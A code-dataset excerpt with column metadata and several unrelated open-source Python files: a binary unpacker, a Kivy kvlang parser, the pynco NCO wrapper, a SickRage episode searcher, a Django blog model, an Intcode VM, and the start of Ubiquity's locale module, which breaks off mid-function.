repo_name
stringlengths 5
92
| path
stringlengths 4
221
| copies
stringclasses 19
values | size
stringlengths 4
6
| content
stringlengths 766
896k
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 32
997
| alpha_frac
float64 0.25
0.96
| autogenerated
bool 1
class | ratio
float64 1.5
13.6
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
decimalbell/devnull
|
python/sidl/unpacker.py
|
1
|
3416
|
import struct
class Unpacker(object):
def __init__(self, buf):
self._buffer = buf
self._offset = 0
self._typemethods = {'b': self.unpack_int8, 'B': self.unpack_uint8,
'h': self.unpack_int16, 'H': self.unpack_uint16,
'i': self.unpack_int32, 'I': self.unpack_uint32,
'q': self.unpack_int64, 'Q': self.unpack_uint64,
'f': self.unpack_float, 'd': self.unpack_double,
's': self.unpack_string, 'm': self.unpack_message,
}
@property
def offset(self):
return self._offset
def unpack_integer(self, fmt):
value = struct.unpack_from(fmt, self._buffer, self._offset)
self._offset = self._offset + struct.calcsize(fmt)
return value[0]
def unpack_int8(self):
return self.unpack_integer('<b')
def unpack_int16(self):
return self.unpack_integer('<h')
def unpack_int32(self):
return self.unpack_integer('<l')
def unpack_int64(self):
return self.unpack_integer('<q')
def unpack_uint8(self):
return self.unpack_integer('<B')
def unpack_uint16(self):
return self.unpack_integer('<H')
def unpack_uint32(self):
return self.unpack_integer('<I')
def unpack_uint64(self):
return self.unpack_integer('<Q')
def unpack_float(self):
return float(self.unpack_string())
def unpack_double(self):
return float(self.unpack_string())
def unpack_string(self):
l = self.unpack_uint16()
s = struct.unpack_from('%ds' % (l,), self._buffer, self._offset)
self._offset = self._offset + l
return s[0].decode('utf-8')
def unpack_binary(self):
l = self.unpack_uint32()
s = struct.unpack_from('%ds' % (l,), self._buffer, self._offset)
self._offset = self._offset + l
return s[0].decode('utf-8')
def unpack_message(self, msg):
msg.unpack(self)
def unpack_list(self, l):
length = self.unpack_uint32()
if l.typecode in l.typecodes[:-1]:
for _ in range(0, length):
value = self._typemethods[l.typecode]()
l.append(value)
elif l.typecode == l.typecodes[-1]:
for _ in range(0, length):
msg = l.type()
self._typemethods[l.typecode](msg)
l.append(msg)
def unpack_set(self, s):
length = self.unpack_uint32()
if s.typecode in s.typecodes[:-1]:
for _ in range(0, length):
value = self._typemethods[s.typecode]()
s.add(value)
elif s.typecode == s.typecodes[-1]:
for _ in range(0, length):
msg = s.type()
self._typemethods[s.typecode](msg)
s.add(msg)
def unpack_dict(self, d):
length = self.unpack_uint32()
for _ in range(0, length):
# key
key = self._typemethods[d.key_typecode]()
# value
if d.value_typecode in d.typecodes[:-1]:
value = self._typemethods[d.value_typecode]()
elif d.value_typecode == d.typecodes[-1]:
value = d.value_type()
self._typemethods[d.value_typecode](value)
d[key] = value
|
mit
| -6,304,016,966,791,125,000
| 31.226415
| 79
| 0.522248
| false
| 3.78714
| false
| false
| false
|
kived/kvlang
|
kvlang/ast_parser.py
|
1
|
4502
|
from functools import partial
import weakref
from kivy.compat import iteritems
from kivy.factory import Factory
from kivy.lang import ParserRuleProperty, Parser, ParserException, ParserRule as kivy_ParserRule, Builder as kivy_Builder
from kivy.logger import Logger
from kivy.weakproxy import WeakProxy
from kvlang.kvTree import DirectiveNode, WidgetNode, WidgetLikeNode, PropertyNode, CanvasNode, InstructionNode
class ParserRule(kivy_ParserRule):
__slots__ = ('ast_node', '__weakref__')
def load_ast(self, ast, **kwargs):
kwargs.setdefault('rulesonly', False)
self._current_filename = fn = kwargs.get('filename', None)
if fn in self.files:
Logger.warning(
'kvlang: The file {} is loaded multiple times, '
'you might have unwanted behaviors.'.format(fn))
try:
parser = ASTParser(ast=ast)
self.rules.extend(parser.rules)
self._clear_matchcache()
for name, cls, template in parser.templates:
self.templates[name] = (cls, template, fn)
Factory.register(name, cls=partial(self.template, name), is_template=True)
for name, baseclasses in iteritems(parser.dynamic_classes):
Factory.register(name, baseclasses=baseclasses, filename=fn)
if kwargs['rulesonly'] and parser.root:
filename = kwargs.get('rulesonly', '<string>')
raise Exception('The file <%s> contains also non-rules '
'directives' % filename)
if fn and (parser.templates or
parser.dynamic_classes or parser.rules):
self.files.append(fn)
if parser.root:
widget = Factory.get(parser.root.name)()
self._apply_rule(widget, parser.root, parser.root)
return widget
finally:
self._current_filename = None
Builder_apply_rule = kivy_Builder._apply_rule
def _apply_rule(self, widget, rule, *args, **kwargs):
Builder_apply_rule(widget, rule, *args, **kwargs)
if hasattr(rule, 'ast_node'):
widget.ast_node = rule.ast_node
widget.ast_node.ast_widget = widget.proxy_ref
kivy_Builder._apply_rule = partial(_apply_rule, kivy_Builder)
class ASTParser(Parser):
def __init__(self, **kwargs):
self.ast = kwargs.get('ast', None)
if self.ast is None:
raise ValueError('No AST passed')
kwargs['content'] = self.ast
super(ASTParser, self).__init__(**kwargs)
def execute_directives(self):
for directive in self.ast.find_all(DirectiveNode):
self.directives.append((directive.token.line,
str(directive).strip()[2:]))
super(ASTParser, self).execute_directives()
def parse(self, ast):
lines = ast.source.splitlines()
if not lines:
return
num_lines = len(lines)
lines = list(zip(list(range(num_lines)), lines))
self.sourcecode = lines[:]
self.execute_directives()
rules = self.parse_tree(ast.tree)
for rule in rules:
rule.precompile()
def parse_tree(self, root):
if not root:
return []
nodes = root.children if root.isNil() else [root]
return self.parse_nodes(nodes)
def parse_nodes(self, nodes, level=0):
objects = []
for node in [n for n in nodes if isinstance(n, WidgetLikeNode)]:
ln = node.get_sourceline()
name = str(node)
if (level != 0
and name not in self.PROP_ALLOWED
and any(ord(z) not in self.PROP_RANGE for z in name)):
raise ParserException(self, ln, 'Invalid class name')
current_object = ParserRule(self, ln, name, level)
objects.append(current_object)
node.ast_rule = weakref.proxy(current_object)
current_object.ast_node = weakref.proxy(node)
for child in node.interesting_children():
if isinstance(child, PropertyNode):
name = child.name
value = child.parsevalue
if name == 'id':
if len(value) == 0:
raise ParserException(self, ln, 'Empty id')
if value in ('self', 'root'):
raise ParserException(self, ln,
'Invalid id, cannot be "self" or "root"')
current_object.id = value
elif len(value):
rule = ParserRuleProperty(self, ln, name, value)
if name[:3] == 'on_':
current_object.handlers.append(rule)
else:
current_object.properties[name] = rule
elif isinstance(child, CanvasNode):
canvas = self.parse_nodes([child], level + 2)
setattr(current_object, child.canvas_object, canvas[0])
elif isinstance(child, (WidgetNode, InstructionNode)):
children = self.parse_nodes([child], level + 1)
children_set = getattr(current_object, 'children', [])
children_set += children
current_object.children = children_set
return objects
|
mit
| -200,474,541,999,551,460
| 29.835616
| 121
| 0.677477
| false
| 3.372285
| false
| false
| false
|
nco/pynco
|
nco/nco.py
|
1
|
19238
|
"""
nco module. Use Nco class as interface.
"""
import distutils.spawn
import os
import re
import shlex
import six
import subprocess
import tempfile
from distutils.version import LooseVersion
class NCOException(Exception):
def __init__(self, stdout, stderr, returncode):
super(NCOException, self).__init__()
self.stdout = stdout
self.stderr = stderr
self.returncode = returncode
self.msg = "(returncode:{0}) {1}".format(returncode, stderr)
def __str__(self):
return self.msg
class Nco(object):
def __init__(
self,
returnCdf=False,
return_none_on_error=False,
force_output=True,
cdf_module="netcdf4",
debug=0,
**kwargs
):
operators = [
"ncap2",
"ncatted",
"ncbo",
"nces",
"ncecat",
"ncflint",
"ncks",
"ncpdq",
"ncra",
"ncrcat",
"ncrename",
"ncwa",
"ncea",
]
if "NCOpath" in os.environ:
self.nco_path = os.environ["NCOpath"]
else:
self.nco_path = os.path.split(distutils.spawn.find_executable("ncks"))[0]
self.operators = operators
self.return_cdf = returnCdf
self.return_none_on_error = return_none_on_error
self.force_output = force_output
self.cdf_module = cdf_module
self.debug = debug
self.outputOperatorsPattern = [
"-H",
"--data",
"--hieronymus",
"-M",
"--Mtd",
"--Metadata",
"-m",
"--mtd",
"--metadata",
"-P",
"--prn",
"--print",
"-r",
"--revision",
"--vrs",
"--version",
"--u",
"--units",
]
self.OverwriteOperatorsPattern = ["-O", "--ovr", "--overwrite"]
self.AppendOperatorsPattern = ["-A", "--apn", "--append"]
# operators that can function with a single file
self.SingleFileOperatorsPattern = ["ncap2" , "ncatted", "ncks", "ncrename"]
self.DontForcePattern = (
self.outputOperatorsPattern
+ self.OverwriteOperatorsPattern
+ self.AppendOperatorsPattern
)
# I/O from call
self.returncode = 0
self.stdout = ""
self.stderr = ""
if kwargs:
self.options = kwargs
else:
self.options = None
def __dir__(self):
res = dir(type(self)) + list(self.__dict__.keys())
res.extend(self.operators)
return res
def call(self, cmd, inputs=None, environment=None, use_shell=False):
inline_cmd = cmd
if inputs is not None:
if isinstance(inputs, str):
inline_cmd.append(inputs)
else:
# assume it's an iterable
inline_cmd.extend(inputs)
if self.debug:
print("# DEBUG ==================================================")
if environment:
for key, val in list(environment.items()):
print("# DEBUG: ENV: {0} = {1}".format(key, val))
print("# DEBUG: CALL>> {0}".format(" ".join(inline_cmd)))
print("# DEBUG ==================================================")
# if we're using the shell then we need to pass a single string as the command rather than in iterable
if use_shell:
inline_cmd = " ".join(inline_cmd)
try:
proc = subprocess.Popen(
inline_cmd,
shell=use_shell,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
env=environment,
)
except OSError:
# Argument list may have been too long, so don't use a shell
proc = subprocess.Popen(
inline_cmd,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
env=environment,
)
retvals = proc.communicate()
return {
"stdout": retvals[0],
"stderr": retvals[1],
"returncode": proc.returncode,
}
def has_error(self, method_name, inputs, cmd, retvals):
if self.debug:
print(
"# DEBUG: RETURNCODE: {return_code}".format(
return_code=retvals["returncode"]
)
)
if retvals["returncode"] != 0:
print("Error in calling operator {method} with:".format(method=method_name))
print(">>> {command} <<<".format(command=" ".join(cmd)))
print("Inputs: {0!s}".format(inputs))
print(retvals["stderr"])
return True
else:
return False
def __getattr__(self, nco_command):
# shortcut to avoid calling auto_doc decorator if command doesn't exist
if nco_command not in self.operators:
raise AttributeError("Unknown command: {cmd}".format(cmd=nco_command))
# first run the auto_doc decorator, which runs the command with --help option, in order to pull in usage info
@auto_doc(nco_command, self)
def get(self, input, **kwargs):
"""
This is the function that's called when this __getattr__ "magic" function runs.
Parses options and constructs/calls an appropriate/corresponding NCO command.
:param self:
:param input:
:param kwargs:
:return:
"""
options = kwargs.pop("options", [])
force = kwargs.pop("force", self.force_output)
output = kwargs.pop("output", None)
environment = kwargs.pop("env", None)
debug = kwargs.pop("debug", self.debug)
return_cdf = kwargs.pop("returnCdf", False)
return_array = kwargs.pop("returnArray", False)
return_ma_array = kwargs.pop("returnMaArray", False)
operator_prints_out = kwargs.pop("operator_prints_out", False)
use_shell = kwargs.pop("use_shell", True)
# build the NCO command
# 1. the NCO operator
cmd = [os.path.join(self.nco_path, nco_command)]
if options:
for option in options:
if isinstance(option, str):
cmd.extend(str.split(option))
elif hasattr(option,"prn_option"):
cmd.extend(option.prn_option().split())
else:
# assume it's an iterable
cmd.extend(option)
if debug:
if type(debug) == bool:
# assume debug level is 3
cmd.append("--nco_dbg_lvl=3")
elif type(debug) == int:
cmd.append("--nco_dbg_lvl={0}".format(debug))
else:
raise TypeError(
"Unknown type for debug: \
{0}".format(
type(debug)
)
)
if output and force and os.path.isfile(output):
# make sure overwrite is set
if debug:
print("Overwriting file: {0}".format(output))
if any([i for i in cmd if i in self.DontForcePattern]):
force = False
else:
force = False
# 2b. all other keyword args become options
if kwargs:
for key, val in list(kwargs.items()):
if val and type(val) == bool:
cmd.append("--{0}".format(key))
if cmd[-1] in self.DontForcePattern:
force = False
elif (
isinstance(val, str)
or isinstance(val, int)
or isinstance(val, float)
):
cmd.append("--{option}={value}".format(option=key, value=val))
else:
# we assume it's either a list, a tuple or any iterable
cmd.append(
"--{option}={values}".format(
option=key, values=",".join(val)
)
)
# 2c. Global options come in
if self.options:
for key, val in list(self.options.items()):
if val and type(val) == bool:
cmd.append("--" + key)
elif isinstance(val, str):
cmd.append("--{0}={1}".format(key, val))
else:
# we assume it's either a list, a tuple or any iterable
cmd.append("--{0}={1}".format(key, ",".join(val)))
# 3. Add in overwrite if necessary
if force:
cmd.append("--overwrite")
# Check if operator appends
operator_appends = False
for piece in cmd:
if piece in self.AppendOperatorsPattern:
operator_appends = True
# If operator appends and NCO version >= 4.3.7, remove -H -M -m
# and their ancillaries from outputOperatorsPattern
if operator_appends and nco_command == "ncks":
nco_version = self.version()
if LooseVersion(nco_version) >= LooseVersion("4.3.7"):
self.outputOperatorsPattern = [
"-r",
"--revision",
"--vrs",
"--version",
]
# Check if operator prints out
for piece in cmd:
if piece in self.outputOperatorsPattern:
operator_prints_out = True
if operator_prints_out:
retvals = self.call(cmd, inputs=input)
self.returncode = retvals["returncode"]
self.stdout = retvals["stdout"]
self.stderr = retvals["stderr"]
if not self.has_error(nco_command, input, cmd, retvals):
return retvals["stdout"]
# parsing can be done by 3rd party
else:
if self.return_none_on_error:
return None
else:
raise NCOException(**retvals)
else:
if output is not None:
if isinstance(output, str):
cmd.append("--output={0}".format(output))
else:
# we assume it's an iterable.
if len(output) > 1:
raise TypeError(
"Only one output allowed, must be string or 1 length iterable. "
"Recieved output: {out} with a type of {type}".format(
out=output, type=type(output)
)
)
cmd.extend("--output={0}".format(output))
elif not (nco_command in self.SingleFileOperatorsPattern):
# create a temporary file, use this as the output
file_name_prefix = nco_command + "_" + input.split(os.sep)[-1]
tmp_file = tempfile.NamedTemporaryFile(
mode="w+b", prefix=file_name_prefix, suffix=".tmp", delete=False
)
output = tmp_file.name
cmd.append("--output={0}".format(output))
retvals = self.call(
cmd, inputs=input, environment=environment, use_shell=use_shell
)
self.returncode = retvals["returncode"]
self.stdout = retvals["stdout"]
self.stderr = retvals["stderr"]
if self.has_error(nco_command, input, cmd, retvals):
if self.return_none_on_error:
return None
else:
print(self.stdout)
print(self.stderr)
raise NCOException(**retvals)
if return_array:
return self.read_array(output, return_array)
elif return_ma_array:
return self.read_ma_array(output, return_ma_array)
elif self.return_cdf or return_cdf:
if not self.return_cdf:
self.load_cdf_module()
return self.read_cdf(output)
else:
return output
if (nco_command in self.__dict__) or (nco_command in self.operators):
if self.debug:
print("Found method: {0}".format(nco_command))
# cache the method for later
setattr(self.__class__, nco_command, get)
return get.__get__(self)
else:
# If the method isn't in our dictionary, act normal.
print("#=====================================================")
print("Cannot find method: {0}".format(nco_command))
raise AttributeError("Unknown method {0}!".format(nco_command))
def load_cdf_module(self):
if self.cdf_module == "netcdf4":
try:
import netCDF4 as cdf
self.cdf = cdf
except Exception:
raise ImportError(
"Could not load python-netcdf4 - try to "
"setting 'cdf_module='scipy'"
)
elif self.cdf_module == "scipy":
try:
import scipy.io.netcdf as cdf
self.cdf = cdf
except Exception:
raise ImportError(
"Could not load scipy.io.netcdf - try to "
"setting 'cdf_module='netcdf4'"
)
else:
raise ValueError(
"Unknown value provided for cdf_module. Valid "
"values are 'scipy' and 'netcdf4'"
)
def set_return_array(self, value=True):
self.returnCdf = value
if value:
self.load_cdf_module()
def unset_return_array(self):
self.set_return_array(False)
def has_nco(self, path=None):
if path is None:
path = self.nco_path
if os.path.isdir(path) and os.access(path, os.X_OK):
return True
else:
return False
def check_nco(self):
if self.has_nco():
call = [os.path.join(self.nco_path, "ncra"), "--version"]
proc = subprocess.Popen(
" ".join(call), stderr=subprocess.PIPE, stdout=subprocess.PIPE
)
retvals = proc.communicate()
print(retvals)
def set_nco_path(self, value):
self.nco_path = value
def get_nco_path(self):
return self.nco_path
# ==================================================================
# Additional operators:
# ------------------------------------------------------------------
@property
def module_version(self):
return "0.0.0"
def version(self):
# return NCO's version
proc = subprocess.Popen(
[os.path.join(self.nco_path, "ncra"), "--version"],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
)
ret = proc.communicate()
ncra_help = ret[1]
if isinstance(ncra_help, bytes):
ncra_help = ncra_help.decode("utf-8")
match = re.search(r"NCO netCDF Operators version (\d.*) ", ncra_help)
# some versions write version information in quotation marks
if not match:
match = re.search(r'NCO netCDF Operators version "(\d.*)" ', ncra_help)
return match.group(1).split(" ")[0]
def read_cdf(self, infile):
"""Return a cdf handle created by the available cdf library.
python-netcdf4 and scipy supported (default:scipy)"""
if not self.return_cdf:
self.load_cdf_module()
if self.cdf_module == "scipy":
# making it compatible to older scipy versions
file_obj = self.cdf.netcdf_file(infile, mode="r")
elif self.cdf_module == "netcdf4":
file_obj = self.cdf.Dataset(infile)
else:
raise ImportError(
"Could not import data \
from file {0}".format(
infile
)
)
return file_obj
def open_cdf(self, infile):
"""Return a cdf handle created by the available cdf library.
python-netcdf4 and scipy suported (default:scipy)"""
if not self.return_cdf:
self.load_cdf_module()
if self.cdf_module == "scipy":
# making it compatible to older scipy versions
print("Use scipy")
file_obj = self.cdf.netcdf_file(infile, mode="r+")
elif self.cdf_module == "netcdf4":
print("Use netcdf4")
file_obj = self.cdf.Dataset(infile, "r+")
else:
raise ImportError(
"Could not import data \
from file: {0}".format(
infile
)
)
return file_obj
def read_array(self, infile, var_name):
"""Directly return a numpy array for a given variable name"""
file_handle = self.read_cdf(infile)
try:
# return the data array
return file_handle.variables[var_name][:]
except KeyError:
print("Cannot find variable: {0}".format(var_name))
raise KeyError
def read_ma_array(self, infile, var_name):
"""Create a masked array based on cdf's FillValue"""
file_obj = self.read_cdf(infile)
# .data is not backwards compatible to old scipy versions, [:] is
data = file_obj.variables[var_name][:]
# load numpy if available
try:
import numpy as np
except Exception:
raise ImportError("numpy is required to return masked arrays.")
if hasattr(file_obj.variables[var_name], "_FillValue"):
# return masked array
fill_val = file_obj.variables[var_name]._FillValue
retval = np.ma.masked_where(data == fill_val, data)
else:
# generate dummy mask which is always valid
retval = np.ma.array(data)
return retval
def auto_doc(tool, nco_self):
"""
Generate the __doc__ string of the decorated function by calling the nco help command
:param tool:
:param nco_self:
:return:
"""
def desc(func):
func.__doc__ = nco_self.call([tool, "--help"]).get("stdout")
return func
return desc
|
mit
| -416,057,038,847,101,900
| 34.429098
| 117
| 0.477025
| false
| 4.599092
| false
| false
| false
|
CristianBB/SickRage
|
sickbeard/dailysearcher.py
|
1
|
4268
|
# Author: Nic Wolfe <nic@wolfeden.ca>
# URL: https://sickrage.github.io
# Git: https://github.com/SickRage/SickRage.git
#
# This file is part of SickRage.
#
# SickRage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickRage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickRage. If not, see <http://www.gnu.org/licenses/>.
import datetime
import threading
import sickbeard
from sickbeard import logger
from sickbeard import db
from sickbeard import common
from sickbeard import network_timezones
from sickrage.show.Show import Show
from sickrage.helper.exceptions import MultipleShowObjectsException
class DailySearcher():
def __init__(self):
self.lock = threading.Lock()
self.amActive = False
def run(self, force=False):
"""
Runs the daily searcher, queuing selected episodes for search
:param force: Force search
"""
if self.amActive:
return
self.amActive = True
logger.log(u"Searching for new released episodes ...")
if not network_timezones.network_dict:
network_timezones.update_network_dict()
if network_timezones.network_dict:
curDate = (datetime.date.today() + datetime.timedelta(days=1)).toordinal()
else:
curDate = (datetime.date.today() + datetime.timedelta(days=2)).toordinal()
curTime = datetime.datetime.now(network_timezones.sb_timezone)
myDB = db.DBConnection()
sqlResults = myDB.select("SELECT * FROM tv_episodes WHERE status = ? AND season > 0 AND (airdate <= ? and airdate > 1)",
[common.UNAIRED, curDate])
sql_l = []
show = None
for sqlEp in sqlResults:
try:
if not show or int(sqlEp["showid"]) != show.indexerid:
show = Show.find(sickbeard.showList, int(sqlEp["showid"]))
# for when there is orphaned series in the database but not loaded into our showlist
if not show or show.paused:
continue
except MultipleShowObjectsException:
logger.log(u"ERROR: expected to find a single show matching " + str(sqlEp['showid']))
continue
if show.airs and show.network:
# This is how you assure it is always converted to local time
air_time = network_timezones.parse_date_time(sqlEp['airdate'], show.airs, show.network).astimezone(network_timezones.sb_timezone)
# filter out any episodes that haven't started airing yet,
# but set them to the default status while they are airing
# so they are snatched faster
if air_time > curTime:
continue
ep = show.getEpisode(int(sqlEp["season"]), int(sqlEp["episode"]))
with ep.lock:
if ep.season == 0:
logger.log(u"New episode " + ep.prettyName() + " airs today, setting status to SKIPPED because is a special season")
ep.status = common.SKIPPED
else:
logger.log(u"New episode %s airs today, setting to default episode status for this show: %s" % (ep.prettyName(), common.statusStrings[ep.show.default_ep_status]))
ep.status = ep.show.default_ep_status
sql_l.append(ep.get_sql())
if len(sql_l) > 0:
myDB = db.DBConnection()
myDB.mass_action(sql_l)
else:
logger.log(u"No new released episodes found ...")
# queue episode for daily search
dailysearch_queue_item = sickbeard.search_queue.DailySearchQueueItem()
sickbeard.searchQueueScheduler.action.add_item(dailysearch_queue_item)
self.amActive = False
|
gpl-3.0
| -8,188,740,517,060,104,000
| 37.45045
| 182
| 0.626992
| false
| 4.163902
| false
| false
| false
|
aileron-split/aileron-web
|
server/blog/models.py
|
1
|
1104
|
from django.db import models
# Blog app models.
class Post(models.Model):
published = models.BooleanField(default=False)
published_date = models.DateTimeField(null=True, blank=True)
slug = models.SlugField(max_length=80)
title = models.CharField(max_length=80, default='Post Title')
subtitle = models.CharField(max_length=200, null=True, blank=True)
summary = models.TextField(default='Post summary.')
content = models.TextField(default='Post content.')
card_sm_image = models.ImageField(upload_to='images/cards/', null=True, blank=True)
card_mat_image = models.ImageField(upload_to='images/cards/', null=True, blank=True)
card_lg_image = models.ImageField(upload_to='images/cards/', null=True, blank=True)
video = models.URLField(null=True, blank=True)
album = models.ForeignKey('gallery.Album', blank=True, null=True)
author = models.ForeignKey('team.Member', blank=True, null=True)
created_date = models.DateTimeField(auto_now_add=True)
modified_date = models.DateTimeField(auto_now=True)
def __str__(self):
return self.title
|
gpl-3.0
| 2,635,139,199,670,405,000
| 47
| 88
| 0.71558
| false
| 3.631579
| false
| false
| false
|
BrendanLeber/adventofcode
|
2019/09-sensor_boost/intcode.py
|
1
|
7073
|
# -*- coding: utf-8 -*-
import pdb
import sys
import traceback
from collections import deque
from enum import IntEnum
from typing import Deque, Dict, List, NamedTuple, Optional, Tuple, Union
class ParameterMode(IntEnum):
POSITIONAL = 0
IMMEDIATE = 1
RELATIVE = 2
class ParameterType(IntEnum):
READ = 0
WRITE = 1
class InstructionInfo(NamedTuple):
name: str
params: Tuple[ParameterType, ...]
INSTRUCTIONS: Dict[int, InstructionInfo] = {
1: InstructionInfo("add", (ParameterType.READ, ParameterType.READ, ParameterType.WRITE)),
2: InstructionInfo("mul", (ParameterType.READ, ParameterType.READ, ParameterType.WRITE)),
3: InstructionInfo("in", (ParameterType.WRITE,)),
4: InstructionInfo("out", (ParameterType.READ,)),
5: InstructionInfo("jnz", (ParameterType.READ, ParameterType.READ)),
6: InstructionInfo("jz", (ParameterType.READ, ParameterType.READ)),
7: InstructionInfo("lt", (ParameterType.READ, ParameterType.READ, ParameterType.WRITE)),
8: InstructionInfo("eq", (ParameterType.READ, ParameterType.READ, ParameterType.WRITE)),
9: InstructionInfo("rbo", (ParameterType.READ,)),
99: InstructionInfo("halt", tuple()),
}
class Intcode:
def __init__(self, program: List[int]) -> None:
self.ip: int = 0
self.program: List[int] = program[:]
self.tape: List[int] = program[:]
# add extra memory space for data buffer
self.tape += [0] * max(1024, len(self.program) * 3)
self.relative_base: int = 0
self.last_output: Optional[int] = None
self.last_input: Optional[int] = None
self.chained_mode: bool = False
self.inputs: Deque = deque()
# self.execution_trace: Dict[int, str] = {}
def _disasm(self) -> str:
addr = f"{self.ip:5}"
opcode = self.tape[self.ip] % 100
opname = INSTRUCTIONS[opcode].name
params = []
mask = 10
for pnum, ptype in enumerate(INSTRUCTIONS[opcode].params, 1):
mask *= 10
pmode = ParameterMode((self.tape[self.ip] // mask) % 10)
if ptype == ParameterType.WRITE:
leader = "$"
elif pmode == ParameterMode.POSITIONAL:
leader = "$"
elif pmode == ParameterMode.RELATIVE:
leader = "@"
else:
leader = ""
params.append(f"{leader}{self.tape[self.ip + pnum]}")
return addr + ": " + f"{opname} " + ", ".join(params)
def decode_instruction(self) -> Tuple[int, List[int]]:
"""Decode the opcode and the arguments for this instruction."""
opcode: int = self.tape[self.ip] % 100
arguments: List[int] = []
mask: int = 10
# start at 1 to skip the opcode in the instruction
for param_num, param_type in enumerate(INSTRUCTIONS[opcode].params, 1):
mask *= 10
param_mode: ParameterMode = ParameterMode((self.tape[self.ip] // mask) % 10)
if param_type == ParameterType.WRITE:
position = self.tape[self.ip + param_num]
if param_mode == ParameterMode.RELATIVE:
position += self.relative_base
arguments.append(position)
elif param_mode == ParameterMode.POSITIONAL:
position = self.tape[self.ip + param_num]
arguments.append(self.tape[position])
elif param_mode == ParameterMode.IMMEDIATE:
arguments.append(self.tape[self.ip + param_num])
elif param_mode == ParameterMode.RELATIVE:
position = self.tape[self.ip + param_num] + self.relative_base
arguments.append(self.tape[position])
else:
raise TypeError(f"unknown parameter mode {param_mode}")
return (opcode, arguments)
def execute(self) -> Union[Optional[int], bool]:
"""Execute the instructions contained in the VM memory."""
while self.ip < len(self.program):
# self.execution_trace[self.ip] = self._disasm()
opcode, params = self.decode_instruction()
if opcode == 1:
self.tape[params[2]] = params[0] + params[1]
self.ip += 1 + len(params)
elif opcode == 2:
self.tape[params[2]] = params[0] * params[1]
self.ip += 1 + len(params)
elif opcode == 3:
if self.chained_mode and self.inputs:
value = self.inputs.popleft()
else:
value = int(input("$ "))
self.last_input = self.tape[params[0]] = value
self.ip += 1 + len(params)
elif opcode == 4:
self.last_output = params[0]
self.ip += 1 + len(params)
if self.chained_mode:
return True
else:
print(self.last_output)
elif opcode == 5:
self.ip = params[1] if params[0] else self.ip + 1 + len(params)
elif opcode == 6:
self.ip = params[1] if not params[0] else self.ip + 1 + len(params)
elif opcode == 7:
self.tape[params[2]] = 1 if params[0] < params[1] else 0
self.ip += 1 + len(params)
elif opcode == 8:
self.tape[params[2]] = 1 if params[0] == params[1] else 0
self.ip += 1 + len(params)
elif opcode == 9:
self.relative_base += params[0]
self.ip += 1 + len(params)
elif opcode == 99:
if self.chained_mode:
return False
else:
return self.last_output
raise EOFError("reached end of tape without finding halt instruction.")
def reset(self) -> None:
"""Reset the VM state before starting a new execution."""
self.tape = self.program[:]
# add extra memory space for data buffer
self.tape += [0] * max(1024, len(self.program) * 3)
self.ip = 0
self.relative_base = 0
# self.execution_trace = {}
def set_inputs(self, inputs: List[int]) -> None:
"""Set the inputs for the VM to read."""
self.inputs = deque(inputs)
def set_noun_and_verb(self, noun: int, verb: int) -> None:
"""Set the noun and verb to initialize the program."""
self.tape[1] = noun
self.tape[2] = verb
if __name__ == "__main__":
program: List[int] = []
with open(sys.argv[1]) as inf:
for line in inf:
program += list(map(int, line.strip().split(",")))
try:
vm = Intcode(program)
vm.execute()
# addrs = list(vm.execution_trace.keys())
# addrs.sort()
# for addr in addrs:
# print(f"{vm.execution_trace[addr]}")
# for ip in range(addrs[-1] + 1, len(vm.program)):
# print(f"{ip:5d}: {vm.program[ip]}")
except Exception:
traceback.print_exc()
pdb.post_mortem()
|
mit
| -8,612,136,722,465,389,000
| 37.862637
| 93
| 0.548565
| false
| 3.846112
| false
| false
| false
|
Alberto-Beralix/Beralix
|
i386-squashfs-root/usr/lib/ubiquity/ubiquity/i18n.py
|
1
|
12630
|
# -*- coding: utf-8; Mode: Python; indent-tabs-mode: nil; tab-width: 4 -*-
# Copyright (C) 2006, 2007, 2008 Canonical Ltd.
# Written by Colin Watson <cjwatson@ubuntu.com>.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import re
import subprocess
import codecs
import os
import locale
import sys
from ubiquity import misc, im_switch
# if 'just_country' is True, only the country is changing
def reset_locale(frontend, just_country=False):
frontend.start_debconf()
di_locale = frontend.db.get('debian-installer/locale')
if not di_locale:
# TODO cjwatson 2006-07-17: maybe fetch
# languagechooser/language-name and set a language based on
# that?
di_locale = 'en_US.UTF-8'
if 'LANG' not in os.environ or di_locale != os.environ['LANG']:
os.environ['LANG'] = di_locale
os.environ['LANGUAGE'] = di_locale
try:
locale.setlocale(locale.LC_ALL, '')
except locale.Error, e:
print >>sys.stderr, 'locale.setlocale failed: %s (LANG=%s)' % \
(e, di_locale)
if not just_country:
misc.execute_root('fontconfig-voodoo',
'--auto', '--force', '--quiet')
im_switch.start_im()
return di_locale
_strip_context_re = None
def strip_context(unused_question, string):
# po-debconf context
global _strip_context_re
if _strip_context_re is None:
_strip_context_re = re.compile(r'\[\s[^\[\]]*\]$')
string = _strip_context_re.sub('', string)
return string
_translations = None
def get_translations(languages=None, core_names=[], extra_prefixes=[]):
"""Returns a dictionary {name: {language: description}} of translatable
strings.
If languages is set to a list, then only languages in that list will be
translated. If core_names is also set to a list, then any names in that
list will still be translated into all languages. If either is set, then
the dictionary returned will be built from scratch; otherwise, the last
cached version will be returned."""
global _translations
if _translations is None or languages is not None or core_names or extra_prefixes:
if languages is None:
use_langs = None
else:
use_langs = set('c')
for lang in languages:
ll_cc = lang.lower().split('.')[0]
ll = ll_cc.split('_')[0]
